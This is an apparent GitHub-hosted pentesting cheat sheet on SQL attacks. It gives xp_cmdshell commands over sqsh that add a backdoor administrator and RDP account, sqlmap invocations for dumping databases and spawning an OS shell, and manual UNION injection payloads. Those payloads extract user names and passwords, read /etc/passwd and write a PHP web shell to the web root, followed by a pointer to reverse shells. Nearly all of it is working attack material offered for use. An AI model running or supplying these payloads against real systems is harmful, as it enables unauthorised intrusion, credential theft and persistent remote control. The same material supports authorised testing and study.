-
Notifications
You must be signed in to change notification settings - Fork 179
/
Copy pathSQL
77 lines (54 loc) · 2.39 KB
/
SQL
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
SQSH
#Login
sqsh -S <targetip>:<port> -U sa -P password
# commands
exec xp_cmdshell 'whoami'
go
exec xp_cmdshell 'net user kalisa pass /add'
go
exec xp_cmdshell 'net localgroup Administrators kalisa /add'
go
exec xp_cmdshell 'net localgroup "Remote Desktop Users" kalisa /add'
go
------------------------------
SQLMAP
# Crawl the links
sqlmap -u http://<targetip> --crawl=1
sqlmap -u http://<targetip> --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3
# Search for databases
sqlmap –u http://<targetip>/index.php?par= –dbs
# dump tables from database
sqlmap –u http://<targetip>/index.php?par= –dbs –D dbname –tables –-dump
sqlmap –u http://<targetip>/index.php?par= –dbs –D dbname –T tablename –-dump
# OS Shell
sqlmap -u http://<targetip>/comment.php?id=738 --dbms=mysql --osshell
--------------------------------
Manual sql injection commands
# check for sqli vulnerability
?id=1'
# find the number of columns
?id=1 order by 9 -- -
# Find space to output db
?id=1 union select 1,2,3,4,5,6,7,8,9 -- -
# Get username of the sql-user
?id=1 union select 1,2,3,4,user(),6,7,8,9 -- -
# Get version
?id=1 union select 1,2,3,4,version(),6,7,8,9 -- -
# Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- -
# Get all columns from a specific table
?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users' -- -
# Get content from the users-table. From columns name and password. (The 0x3a only servers to create a delimiter between name and password)
?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users
# read file
?id=1 union select 1,2,3,4, load_file('/etc/passwd') ,6,7,8,9 -- -
?id=1 union select 1,2,3,4, load_file('/var/www/login.php') ,6,7,8,9 -- -
# create a file and call it to check if really created
?id=1 union select 1,2,3,4,'this is a test message' ,6,7,8,9 into outfile '/var/www/test' -- -
?id=1 union select 1,2,3,4, load_file('/var/www/test') ,6,7,8,9 -- -
# create a file to get a shell
?id=1 union select null,null,null,null,'<?php system($_GET[‘cmd’]) ?>' ,6,7,8,9 into outfile '/var/www/shell.php' -- -
?id=1 union select null,null,null,null, load_file('/var/www/shell.php') ,6,7,8,9 -- -
# then go to browser and see if you can execute commands
http://<targetip>/shell.php?cmd=id
# Then use Pentest Monkey Reverse Shells to call your shell